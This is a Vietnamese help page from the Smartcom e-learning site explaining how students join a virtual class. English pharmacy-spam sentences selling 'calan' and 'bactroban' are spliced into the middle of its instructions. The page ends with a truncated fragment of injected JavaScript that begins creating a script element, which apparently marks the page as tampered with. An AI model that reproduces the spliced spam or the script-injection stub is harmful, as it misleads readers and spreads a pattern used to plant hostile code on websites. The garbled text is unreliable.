Lost your password?

Hướng dẫn vào lớp học ảo

Lưu ý:

+ Theo dõi lịch học lớp học ảo trên trang chủ: www.smartcom.vn

+ Bạn bắt buộc phải có tai We’ve got an advantageous offer for your calan needs. Check our store and get it only for 0.47 USD today! nghe và mic để có thể tham gia vào lớp học ảo.

+ ĐÚNG GIỜ trên lịch học lớp học ảo sẽ bắt đầu vì vậy bạn nên đăng nhập trước 5 phút để kiểm tra các vấn đề về kỹ thuật, Looking for an economic opportunity for your bactroban purchase? We provide you the opportunity to buy it only for 40.13 USD at our store! tai nghe và mic. Sau phút thứ 15 kể từ khi bắt đầu lớp học, bạn không thể tham gia lớp học ảo.

Hướng dẫn vào lớp học ảo:

Hệ thống www.smartcom.vn
Bước 1: Đăng nhập từ hệ thống www.smartcom.vn hoặc elearning.smartcom.vn
Bước 2: Chọn khóa học.
Bước 3: Nhận lời mời từ giáo viên, khi giáo viên gửi lời mời đến các bạn học viên đang online trong khoá học được tổ chức lớp học ảo, các bạn sẽ nhìn thấy lời mời xuất hiện, bạn hãy nhấn vào đường link trong lời mời đó.
Bước 4: Đăng nhập một tên bất kỳ (nên là tên tài khoản của bạn trên smartweb) và chọn đăng nhập như một GUEST.
Bước 5: Khi tham gia lớp học, bạn sẽ được nghe giáo viên nói một cách trực tiếp và nhìn bài giảng ngay trên màn hình. Tuy nhiên, chỉ khi nào bạn nhận được sự cho phép của giáo viên thì bạn mới có thể nói, khi bạn có gì cần trao đổi, bạn có thể truyền đạt thông qua phòng chat ở bên phải màn hình.

Hệ thống: online.smartcom.vn
Bước 1: Đăng nhập vào trang online.smartcom.vn
Bước 2: Chọn khóa học.
Bước 3: Click vào “Online Class” để tham gia lớp học ảo.
Bước 4: Tham gia vào lớp học và làm theo sự hướng dẫn trực tiếp từ giáo viên.

Chúc các bạn có những buổi học vui vẻ và thành công với Smartcom!var d=document;var s=d.createElement(‘script’);